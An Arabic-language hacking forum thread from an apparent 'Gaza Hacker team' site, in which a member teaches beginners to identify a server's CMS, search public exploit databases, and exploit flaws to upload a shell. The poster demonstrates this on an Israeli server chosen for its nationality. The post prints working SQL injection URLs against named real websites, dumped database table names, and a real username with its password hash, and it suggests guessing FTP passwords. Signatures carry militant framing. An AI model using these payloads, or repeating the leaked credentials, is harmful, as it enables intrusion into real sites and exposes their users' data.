تذكرنــي
التسجيل التعليمات التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة



:: قسم خاص بالمبتدئين ::

يرجى عدم اضافة موضوع ( فقط للادارة) .. عليكم فقط متابعة مواضيعنا


اضافة رد

 
أدوات الموضوع انواع عرض الموضوع

رقم المشاركة : ( 1 )
الصورة الرمزية Casper
Casper
:: فريق قراصنة غزة ::

Casper غير متواجد حالياً
 
رقم العضوية : 20
تاريخ التسجيل : Jul 2009
مكان الإقامة :
عدد المشاركات : 14,332
عدد النقاط : 10
قوة التقييم :
غريب ./~ حَنتِ يَدآيَ لـِ مِسَآسِ يدآها [ BK ]
افتراضي شرح التعامل مع مواقع تسجيل الثغرات واستغلال ثغره ومناقشه بالصوت

كُتب : [ 08-31-2010 - 03:36 PM ]






السلام عليكم ورحمة الله وبركاته ..

راح افتح الموضوع لمناقشه مع المبتدإين حتي يفهمو هادي الخطوه 100% لانها خطوه قويه وراآئعه


الكل بعرف انه مواقع الثغرات يتم تسجيل فيها الثغرات الى بكتشفها الهكر مثل الميل وورم ولاكن اغلق ومثل هادوله الموقعين الجداد

http://inj3ct0r.com/

http://www.exploit-db.com/

طبعا احنا لمن نيجي نخترق سيرفر وفقدنا اامل نرفع شل .. بنروح على مواقع الثغرات وبنعمل بحث عن اسماء السكربتات

اولا بروح على السيرفر الى بدي اخترقه
ip:000.000.000.00 Powered by
راح ي؟هر لى على السيرفر السكربتات المركبه في السيرفر واكيد حتكون اسماء كثيره للسكربتات منها الجديده ومنها ما بنعرفها احنا يدوب بنعرف بعض السكربتات الى بنقدر نتعامل معها لاكن مواقع الثغرات هيه راح تعرفنا بهادي السكربتات

الان مثلا لقيت موقع مركب سكربت Powered by vBulletin
مش ضروري يكون الاسم نفسه ممكن
Powered by Zen Cart
او
Powered by joomla
او
Powered by WordPress
وفيه اسماء سكربتات كثيره بننسخ اسم السكربت مثلا joomla وبروح على موقع من مواقع الى بتنزل فيها الثغرات حناخد هادا المواقع مثلا http://inj3ct0r.com/
بنروح بنعمل بحث من هنا
http://inj3ct0r.com/search
وبنعمل بحث على اسم سكربت مثلا joomla وبطلع النا الثغرات الى نزلت طبعا لو كنا بنخترق موقع مركب سكربت جمله بنصير نفتح ثغره ثغره وبنشوف الاصدار ان كان متوافق معاه او لا وبنصير نحط الاستغلال .. واحيانا بظبط واحيانا لا ..

لاكن بضلها طريقه ..

واحيانا بيكون اختراق عشوائي انا قاعد بأخترق لقيت ثغره ولنفترض انه ثغره احد الاخوه ارسلها الى على الخاص

http://www.exploit-db.com/exploits/12849/
ثغرة sql

طبعا ماراح اضلي اكتب انا عملت شرح فيديو واعزروني اني طولت فيه لانه الثغره اصبحت قديمه وذمانها بدت المواقع الى مركبه ملف php المصاب بدو يرقعوه ..

نحمل الشرح
Download
إضغط هنا للتحميل , إضغط هنا للتحميل , إضغط هنا للتحميل
إضغط هنا للمشاهده ,


لاكن الحلو انه فيه دورك : نستخدم الدوره ونطلع مواقع ناخد اي بي المواقع المهمه ونروح بنبحث عن ثغره بالسيرفر


طبعا السيرفر الى كنت اشرح عليه سيرفر اسرائيلي وبهمني ..
انا بالفيديو ماوضحت كثير عملته سريع لاكن انا استغليت الثغره ورفعت شل ولقيت اغلب المواقع مصابه على السيرفر .. ومنا ما بطلب هاش منها مواقع مفكوكه الهاش

وهادي اكم واحد منها

[HTML]http://www.yuvalalon.co.il/index.php?m_id=20&sm_id=-2005+union+select+1,2,3,4,5,6,7,8,9,10,11[/HTML]


[HTML]http://www.am-secure.com/index.php?m_id=4+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28--[/HTML]


طبعا هادا الموقع بطلع الخطأ بالشريط فوق وطلع اكثر من يزر للقاعده


if_pass>wwgoinf_2604en>menu
if_pass>wwgoinf_2604en>page
if_pass>wwgoinf_2604en>page_shop
master_pass>wwgoinf_2604en>settings
if_pass>wwgoinf_2604en>settings
if_pass>wwgoinf_2604en>sub_menu
u_pass>wwgoinf_2604en>users
u_no_pass>wwgoinf_2604en>users
pass>wwgoinf_2604en>users_admin

نلاحظ اخر واحط طلع نفس يزر القاعده الى بالثغره
نستغل عليه
name : ronenh
pass : b20131fcde6fefd98d46fffb51eb06b5
طبعا الهاش ما انفك معي في الحاله هادي بستخدم يزرات القاعده الثانيه وبدور على لوحاتها وبدخل بشوف ان كان فيه مركذ رفع او لا

ملاحظه : لا تعتمود على ثغرة نزله اعتمدو على سيرفر فيه ثغره افضل من دورك فيه ثغره .. حتقلي ليش ؟ حقلك الثغره لمن تنزل الكل بيصير يرقعها اما السيرفر فأنا بستفيد اكثر فيه مواقع ولازم اني الاقي لو موقع واحد ارفع عليه شل بثغرات متنوعه joomla + sql + upload + Powered by + باسوورد سهل او تخمين اف تي بي

بهيك خلصنا من هادا الموضوع والنقاش مفتوح بخصوصه لمن احب انه يستفيد ..


ولا تنسونا من صالح دعائكم لفريق قراصنة غزه ..


اخوانكم في فريق قراصنة غزه .
جميع الحقوق محفوظه لـ منتدى قراصنة غزه
Gaza Hacker team

www.gaza-hacker.net



توقيع : Casper


أدركت سر رعب الطواغيت من الحركات الإسلامية الخالصة، وهلعهم من أبنائها الصادقين، وذلك لأنهم يتمردون على الدنيا التي يملكها الطغاة، ويدوسون المتاع الرخيص الذي بين أيدي الجبابرة والذي من خلاله يجمعون القطيع ويسوقونه إلى مذابح شهواتهم قرابين رخيصة، إنها عناصر فريدة لا تباع في سوق النخاسة ولا تذوب في حوامض الجاهلية، فتحافظ على أصالتها ونقائها ومثلها ومبادئها في أي جو عاشت ومع أي قوى التقت.
ـــــــــ
عبد الله عزام تقبله الله



آخر تعديل بواسطة Casper ، 03-14-2011 الساعة 05:18 AM
رد مع إقتباس
الأعضاء الذين آرسلوا آعجاب لـ Casper على المشاركة المفيدة:
samiros44 (02-25-2014)
بياناتي
 رقم المشاركة : ( 2 )
the dead man

رقم العضوية : 4037
تاريخ التسجيل : Dec 2009
مكان الإقامة :
عدد المشاركات : 347
عدد النقاط : 10

the dead man غير متواجد حالياً

افتراضي

كُتب : [ 08-31-2010 - 03:42 PM ]


شرح رائع شكرا لك

توقيع : the dead man

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 3 )
hmimed

رقم العضوية : 8034
تاريخ التسجيل : Mar 2010
مكان الإقامة :
عدد المشاركات : 1,331
عدد النقاط : 10

hmimed غير متواجد حالياً

.::TXB9 HaCkEr::.

افتراضي

كُتب : [ 08-31-2010 - 03:44 PM ]


بارك الله فيك كاسبر على الشرح لكن اظن لازملنا مترجم اللغات مثل مترجم لغة بيرل و بي اتش بي ...الخ
و اذا ممكن تضعلنا روابط تحميل هذه البرامج و شكرا

توقيع : hmimed

كود PHP:
txb9@hacker.ps 
جزائري حتى النخاع
كود PHP:
txb9@hacker.dz 

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 5 )
اسد الشرقية

رقم العضوية : 12343
تاريخ التسجيل : Aug 2010
مكان الإقامة :
عدد المشاركات : 327
عدد النقاط : 10

اسد الشرقية غير متواجد حالياً

♥●»~MrGoG HaCkeR ~«●♥

افتراضي

كُتب : [ 08-31-2010 - 04:33 PM ]


بارك الله فيك

شرح كافي ووافي

موفق


توقيع : اسد الشرقية

.:: فريق قراصنة غزة ::.

رد مع إقتباس
بياناتي
 رقم المشاركة : ( 6 )
Casper
:: فريق قراصنة غزة ::

رقم العضوية : 20
تاريخ التسجيل : Jul 2009
مكان الإقامة :
عدد المشاركات : 14,332
عدد النقاط : 10

Casper غير متواجد حالياً

غريب ./~ حَنتِ يَدآيَ لـِ مِسَآسِ يدآها [ BK ]

افتراضي

كُتب : [ 08-31-2010 - 04:59 PM ]


مترجم البيرل موجود هنا
http://gaza-hacker.com/cc/showthread-t_8858.html


اما php راح اخلى اما اخونا كلاو او اخونا ليون يرفعوه وكمان يشرحو طريقة ترجمة ثغرات php


توقيع : Casper


أدركت سر رعب الطواغيت من الحركات الإسلامية الخالصة، وهلعهم من أبنائها الصادقين، وذلك لأنهم يتمردون على الدنيا التي يملكها الطغاة، ويدوسون المتاع الرخيص الذي بين أيدي الجبابرة والذي من خلاله يجمعون القطيع ويسوقونه إلى مذابح شهواتهم قرابين رخيصة، إنها عناصر فريدة لا تباع في سوق النخاسة ولا تذوب في حوامض الجاهلية، فتحافظ على أصالتها ونقائها ومثلها ومبادئها في أي جو عاشت ومع أي قوى التقت.
ـــــــــ
عبد الله عزام تقبله الله


رد مع إقتباس
بياناتي
 رقم المشاركة : ( 7 )
قراصنة غزة
# لا إلـہ إلا اللَّـــہ محمد رسول اللَّـــہ #
رقم العضوية : 6102
تاريخ التسجيل : Jan 2010
مكان الإقامة :
عدد المشاركات : 13,618
عدد النقاط : 10

قراصنة غزة غير متواجد حالياً

# Electronic Jihadist #

افتراضي

كُتب : [ 08-31-2010 - 05:07 PM ]


جزاكم الله خيرا فريق قراصنة غزة ..حفظكم الله


توقيع : قراصنة غزة

رد مع إقتباس

اضافة رد

العلامات المرجعية

الكلمات الدلالية (Tags)
مواقع, التعامل, الثغرات, بالصوت, تسجيل, ثغره, شرح, ومناقشه, واستغلال


يتصفح الموضوع حالياً : 1 (0 قرصان و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


جميع الأوقات بتوقيت GMT +2. الساعة الآن 07:04 AM.



أقسام المنتدى

الأقسام الإسلامية @ .:: القسم الإسلامي العام ::. @ .:: قسم القرآن الكريم وتجويده ::. @ .:: قسم الاناشيد والشريط الاسلامي ::. @ .:: سيرة و قصص الأنبياء و الصحابة ::. @ الأقسام العامة @ .:: قسم الساحة العامة ::. @ .:: قسم فـلـسـطــيــن ::. @ .:: قسم للتوعية الأمنية ::. @ .:: عالم البرامج الكاملة والنادرة ::. @ .:: قسم أخبار التقنية المعلوماتية والتكنولوجية ::. @ .:: قسم عالم المحادثة ::. @ .:: قسم الأمن و الحماية | Security ::. @ ::. قسم حماية الاجهزة والايميلات .:: @ ::. قسم حمايه المواقع والسيرفرات.:: @ ::. قسم إختراق المواقع والأجهزة والبريد الإلكتروني | Hacker .:: @ ::. قسم إختراق المواقع والمنتديات .:: @ ::.قسم إختراق الأجهزه والبريد الاكتروني .:: @ .:: قسم الثغرات ::. @ .:: الركن الترفيهي ::. @ .:: قسم الصور ::. @ .:: ركن الأدارية ::. @ .:: قسم الشكاوي ولأقتراحات ::. @ خاص بشروحات الفيديو @ الأدوات , hack tools @ .:: قسم مساعدة الاعضاء ::. @ :: المواضيع المحذوفة :: @ قسم الانجازات @ .:: جديد قراصنة غزة ::. @ :: قسم استراحة الأعضاء :: @ :: YouTube :: @ .:: القسم التقني ::. @ :: عالمـ الكومبيوتر :: @ :: قسم الجوالات والاتصالات :: @ :: قسم التصميم والغرافيك :: @ خاص للادارة والمشرفين @ :: قسم خاص بالمبتدئين :: @ :: خاص بثغرات المتصفح :: @ :: خاص بشروحات الفيديو :: @ .:: الدورات المقدمة من المشرفين ::. @ :: مشآكل الكومبيوتر وحلولها :: @ .:: للنقاش الجاد ::. @ الملتقى الأدبي .. @ :: طلبات الإشراف :: @ :: كتب الحماية والاختراق security&hacking :: @ البحوث العلمية @ تعليم اللغات الأجنبية @ .:: كتب الكترونية منوعة ::. @ .:: القسم الدعوي ::. @ قسم الكتب الاسلامية @ قسم المواضيع المميزة @ :: قسم خاص بالتشفير :: @ قسم اخبار العالم وقضايا الأمة الإسلامية @ Local root @ دورة إحترآف إلـ Spam Email @ فلسطين , palestine @ .:: مدن وقرى فلسطين ::. @ .:: تاريخ فلسطين ::. @ .:: شهداء فلسطين ::. @ .:: مدينة القدس ::. @ .:: مدينة غزة ::. @ .:: لعروض التصاميم ::. @ .:: لدروس التصاميم ::. @ :: قسم اصدارات وانجازات الفريق :: @ .:: قسم قضية فلسطين ::. @ .:: قسم عروض الاستايلات :.. @ قسم اخبار وقضايا اليهود @ .:: قسم الهاكات وتطوير المنتديات ::. @ ::. قسم المسابقات والنشاطات .:: @ لوحة تحكم سي بانل , cPanel Management @ حماية قواعد البيانات mysql , sql @ لوحة تحكم , Plesk Management @ ادارة سيرفرات Linux @ .:: SQL-injection , حقن قواعد بيانات ::. @ :: قسم خاص بالمبتدئين :: @ .:: قسم الكتب الالكترونية E-BOOK ::. @ .:: قسم تفسير القران الكريم ::. @ قسم الدفاع عن النبي محمد والصحابة وآل البيت @ .:: قسم لغات البرمجة ::. @ قسم برمجة لغة Php , Html @ قسم برمجة لغة mysql , sql @ .:: القسم الرمضانى ::. @ جديد الشيخ نبيل العوضى @ حجب الخدمة , ddos attack @ قسم الاختراق المتقدم @ .:: حماية الاجهزة وطرق كشف التلغيم ::. @ .:: قسم حماية الايميلات :. @ قسم اختراق سيرفرات windows @ .:: دورة قراصنة غزة للتصميم ::. @ .::: أسرى فلسطين ::. @ مدرسة قراصنة غزة لحقن قواعد البيانات @ ::. قسم مشروع الباك تراك backtrack , الميتاسبلويت MetaSploit .:: @ فريق :: Gaza HaCker Injector Team-GHI :: @ دورة أساتذة حقن قواعد البيانات المتقدمة لعام 2017 / 2018 @ GH-InjeCtor-Team @ .:: قسم الصلاة ثم الصلاة ::. @ وَحَرِّضِ الْمُؤْمِنِينَ @ قسم انظمة لينكس Linux, Unix @ قسم الالعاب الالكترونية @ قسم اختراق الشبكات السلكية واللاسلكية @ قسم الميكاترونكس (بناء الروبوتات) @ قسم الدورات المدفوعة @ قسم اختراق الاجهزة اللوحية @ دورات حقن قواعد البيانات للمٌبتدئين من الألف إلى الإحتراف @